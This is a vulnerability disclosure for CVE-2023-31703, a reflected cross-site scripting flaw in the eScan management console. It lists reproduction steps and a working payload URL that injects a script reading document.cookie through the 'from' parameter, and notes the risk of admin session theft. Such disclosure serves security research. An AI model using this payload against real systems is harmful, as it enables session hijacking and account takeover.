Description: Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter in the URL directly.
Vulnerable Product Version: 14.0.1400.2281
Date: 16/05/2023
CVE: CVE-2023-31703
CVE Author: Sahil Ojha
Vendor Homepage: https://www.escanav.com
Software Link: https://cl.escanav.com/ewconsole.dll
Tested on: Windows
Steps to reproduce:
- Login into the eScan Management Console with a valid user credential.
- Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
- Now, Inject the Cross Site Scripting Payload in "from" parameter as shown below and a valid XSS pop up appeared. https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P= https://github.com/sahiloj/CVE-2023-31703/blob/main/XSS%201.png
- By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.